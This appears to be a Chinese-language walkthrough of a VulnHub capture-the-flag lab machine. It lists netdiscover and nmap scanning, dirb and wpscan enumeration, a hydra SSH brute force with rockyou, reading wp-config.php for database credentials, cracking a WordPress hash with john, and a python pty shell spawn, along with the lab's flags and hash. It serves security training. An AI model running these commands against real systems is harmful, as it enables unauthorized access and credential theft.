主機來源:www.vulnhub.com
用到的知識點:
wpscan漏掃
hydra暴破
john解密
python提權
發現IP
安裝成功後,查找此虛擬機的IP,我使用的是netdiscover
netdiscover -i eth0 -r 10.0.3.1/24
發現IP:10.0.3.140
nmap
nmap -sV -p- 10.0.3.140
發現80端口是開的,去看一下
最終在service.html下的源代碼中找到了flag1
flag1{b9bbcb33e11b80be759c4e844862482d}
發現頁面沒有什麼功能之後我們掃下目錄
dirb
dirb http://10.0.3.140
別的先不管,我們發現了wordpress
wpscan
那就不管三七二十一,先掃一遍再說
wpscan --url http://10.0.3.140/wordpress --wp-content-dir -ep -et -eu
找到兩個用戶名
嘗試暴破一下,用這個字典,一般這個目錄下的rockyou是壓縮文件,自己解壓下就好了
hydra
hydra -l michael -P rockyou.txt ssh://10.0.3.140
這裏也可以-L 把這兩個用戶名都加進去,我這裏上帝視角一下,只有michael才能暴破出來。
ssh登錄一下
找到flag2
flag2{fc3fd58dcdad9ab23faca6e9a36e581c}
然後找到/var/www/html/wordpress/wp-config.php,獲得數據庫賬號密碼
登錄數據庫。
在表wp_posts中獲得flag3和flag4。
flag3{afc01ab56b50591e7dccf93122770cd2}
flag4{715dea6c055b9fe3337544932f2941ce}
獲得了steven的密碼
解一下
$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/
用john,直接john 文件名
然後用steven的賬號登錄,登錄成功
可以用python提權
python -c 'import pty;pty.spawn("/bin/sh")'